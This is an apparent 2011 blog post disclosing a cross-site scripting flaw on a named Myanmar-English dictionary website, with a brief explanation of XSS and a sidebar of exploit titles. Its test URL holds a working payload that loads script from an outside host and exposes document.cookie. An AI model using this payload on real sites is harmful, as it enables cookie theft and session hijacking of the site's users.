critical XSS Vulnerability on Ayar Myanmar-English Dictionary

Home / Hacking, News, Security / critical XSS Vulnerability on Ayar Myanmar-English Dictionary

March 15, 2011 PlanetCreator 0 Comments 0 tags

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :Â Â Â Owned by Ayar Myanmar Unicode Group.

Test XSS :

http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E

This vulnerability has been alerted to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

XSS (Cross Site Scripting) Cheat Sheet

What are the user authentications supported by the SSH-2 protocol?

The SSH-2 protocol supports the following user authentications: * Public key authentication (DSA, RSA*, OpenPGP) * Host-based authentication * Password-based authentication Note: SSH-1 supports a wider range of user authentications,

XSS Cheat List

[webapps] D-Link DIR-650IN - Authenticated Command Injection
on April 10, 2026 at 12:00 am
D-Link DIR-650IN - Authenticated Command Injection
[local] NetBT e-Fatura - Privilege Escalation
on April 10, 2026 at 12:00 am
NetBT e-Fatura - Privilege Escalation
[local] ZSH 5.9 - RCE
on April 9, 2026 at 12:00 am
ZSH 5.9 - RCE
[webapps] Jumbo Website Manager - Remote Code Execution
on April 9, 2026 at 12:00 am
Jumbo Website Manager - Remote Code Execution
[webapps] RomM 4.4.0 - XSS_CSRF Chain
on April 9, 2026 at 12:00 am
RomM 4.4.0 - XSS_CSRF Chain